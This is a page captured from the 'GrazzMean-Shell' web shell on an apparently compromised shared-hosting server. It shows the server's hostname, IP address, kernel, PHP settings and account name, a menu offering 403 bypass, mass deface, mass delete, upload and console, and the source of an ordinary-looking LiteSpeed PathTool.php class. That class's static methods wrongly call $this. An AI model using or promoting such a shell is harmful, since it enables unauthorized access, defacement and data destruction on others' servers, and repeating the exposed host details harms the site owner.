shell bypass 403

GrazzMean-Shell Shell

: /usr/local/lsws/admin/html.6.2.2/classes/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 3.16.157.177
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : PathTool.php 
<?php

class PathTool
{
	public static function getAbsolutePath($root, $path)
	{
		if ( substr($path, -1) != '/' ) {
			$path .= '/';
		}
		$newPath = $this->getAbsoluteFile($root, $path);
		return $newPath;
	}

	public static function getAbsoluteFile($root, $path)
	{
		if ( substr($path, 0, 1) != '/' ) {
			$path = $root . '/' . $path;
		}
		$newPath = $this->clean($path);
		return $newPath;
	}

	public static function hasSymbolLink($path)
	{
		return ( $path != realpath($path) );
	}

	public static function clean($path)
	{
		do {
			$newS1 = $path;
			$newS = str_replace('//', '/',  $path);
			$path = $newS;
		} while ( $newS != $newS1 );

		do {
			$newS1 = $path;
			$newS = str_replace('/./', '/',  $path);
			$path = $newS;
		} while ( $newS != $newS1 );
		
		do {
			$newS1 = $path;
			$newS = preg_replace('/\/[^\/^\.]+\/\.\.\//', '/',  $path); 
			$path = $newS;
		} while ( $newS != $newS1 );

		return $path;
	}

	public static function createFile($path, &$err, $htmlname)
	{
		if (file_exists($path)) {
			$err = is_file($path) ? "Already exists $path" : "name conflicting with an existing directory $path";
			return false;
		}

		$dir = substr($path, 0, (strrpos($path, '/')));

		$dirmode = 0700; // default
		$filemode = 0600;
		$specials = ['userDB:location', 'groupDB:location'];
		if (in_array($htmlname, $specials)) {
			$dirmode = 0755; // conf dir will be group protected
			$filemode = 0644;
			$special_note = 'WebAdmin user does not have permission to create this file. You can manually create it and populate the data. Make sure it is readable by the user that web server is running as (usually nobody).';
			if (PathTool::createDir($dir, $dirmode, $err)) {
				if (touch($path)) {
					chmod($path, $filemode);
					return true;
				}
				$err = 'failed to create file ' . $path;
			}
			$err .= '. ' . $special_note;
			return false;
		}

		if (PathTool::createDir($dir, $dirmode, $err)) {
			if (touch($path)) {
				chmod($path, $filemode);
				//populate vhconf tags
				$type = 'vh';
				if ($htmlname == 'templateFile') {
					$type = 'tp';
				}
				$newconf = new ConfData($type, $path, 'newconf');
				$config = new ConfigFile();
				$res = $config->save($newconf);
				if (!$res) {
					$err = 'failed to save to file ' . $path;
					return false;
				}

				return true;
			}
			$err = 'failed to create file ' . $path;
		}

		return false;
	}

	public static function createDir($path, $mode, &$err)
	{
		if (file_exists($path)) {
			if (is_dir($path)) {
				return true;
			}
			$err = "$path is not a directory";
			return false;
		}
		$parent = substr($path, 0, (strrpos($path, '/')));
		if (strlen($parent) <= 1) {
			$err = "invalid path: $path";
			return false;
		}
		if (!file_exists($parent) && !PathTool::createDir($parent, $mode, $err)) {
			return false;
		}

		if (mkdir($path, $mode)) {
			return true;
		}
		$err = "fail to create directory $path";
		return false;
	}

	public static function isDenied($path)
	{
		$absname = realpath($path);
		if (strncmp($absname, '/etc/', 5) == 0) {
			return true;
		}
		return false;
	}

}
© 2025 GrazzMean-Shell